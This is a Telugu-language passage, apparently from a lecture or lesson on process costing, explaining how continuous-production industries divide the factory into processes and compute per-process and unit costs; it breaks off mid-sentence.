ఈ పరిశ్రమల్లో తయారయ్యే ఉత్పత్తి దశల వారీగా జరుగుతూ ఉంటుంది. ప్రతి దశకు ఒక ప్రాసెస్ అంటారు. ఆ ప్రాసెస్కి ఒక ఖాతాని ఏర్పాటు చేయడం జరుగుతుంది. ఆ ప్రాసెస్కి అయ్యేటటువంటి వ్యయాన్ని ప్రత్యేకంగా లెక్కిస్తారు. ఈ పద్ధతినే ప్రాసెస్ కాస్టింగ్ అంటారు. ఈ ప్రాసెస్ కాస్టింగ్ అవలంబించేటటువంటి పరిశ్రమ యొక్క లక్షణాలు కానీ మీరు చూసినట్లయితే, ఈ పరిశ్రమలో ముఖ్యంగా ఉత్పత్తి ప్రక్రియ ఏ విధంగా ఉంటుంది అంటే అవిచ్ఛిన్నంగా కొనసాగుతుంది. అంటే దీని అర్థం ఏంటంటే, ఉత్పత్తి ఒకసారి ఒక ప్రక్రియలో స్టార్ట్ అయినప్పుడు చివరి దశ వరకు కంటిన్యూ అవ్వాలి తప్ప మధ్యలో బ్రేక్ అయ్యేటటువంటి అవకాశం ఉండదు. సో మొట్టమొదటి లక్షణం ఏంటంటే, ఈ పరిశ్రమలో ఉత్పత్తి ప్రక్రియ అవిచ్ఛిన్నంగా కొనసాగాలి. అలాగే రెండోది, ఫ్యాక్టరీ మొత్తాన్ని కొన్ని ప్రాసెస్లుగా విభజించడం జరుగుతూ ఉంటుంది. అలాగే వ్యయం లెక్కించేటప్పుడు ఒక్కొక్క ప్రాసెస్కి ఎంత వ్యయమైంది లెక్కిస్తారు. 4వ లక్షణం చూసినట్లయితే, ప్రాసెస్ మొత్తం వ్యయాన్ని లెక్కించిన తర్వాత ఆ ప్రాసెస్లో ఎంత ఉత్పత్తి అయింది కనుగొని, ఆ ఉత్పత్తి వచ్చిన తర్వాత యూనిట్ వ్యయము కనుగొనడం జరుగుతూ ఉంటుంది. ప్రాసెస్ మొత్తం వ్యయాన్ని ఆ ప్రాసెస్లో ఉత్పత్తి అయినటువంటి వస్తువుల